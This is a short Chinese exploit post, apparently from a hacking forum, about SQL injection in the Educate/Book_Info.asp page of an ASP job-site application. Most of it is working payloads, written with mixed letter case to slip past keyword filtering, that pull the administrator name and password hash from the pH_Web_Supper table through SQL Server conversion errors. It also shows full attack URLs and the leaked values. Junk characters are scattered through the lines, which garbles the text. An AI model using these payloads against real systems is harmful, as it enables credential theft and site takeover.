漏洞出现在Educate/Book_Info.asp+ J9 `7 e- g! p
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
" n6 H$ z7 x* G% Wexp:如下
! D( s9 L( E- r/ w% ]查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper): p3 w3 v; d2 N3 E! U+ w8 \
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper); N; B. s$ j' ~
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& _ d3 Q6 K& O$ W+ ?Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
; C4 b- m* U8 i- d3 Z1 W3 B将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。$ J" n L m0 N
/Educate/Book_Info.asp,行 8
+ g" K' l3 ^& w' E+ M- U: X0 n( Dhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 F3 M# z9 w, c9 ~. v8 `Microsoft OLE DB Provider for SQL Server 错误 '80040e07'" a* ]- s) E8 j5 A/ M6 T0 X: x
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
0 \2 m4 U! J# a9 A/ _+ o' W/Educate/Book_Info.asp,行 8 |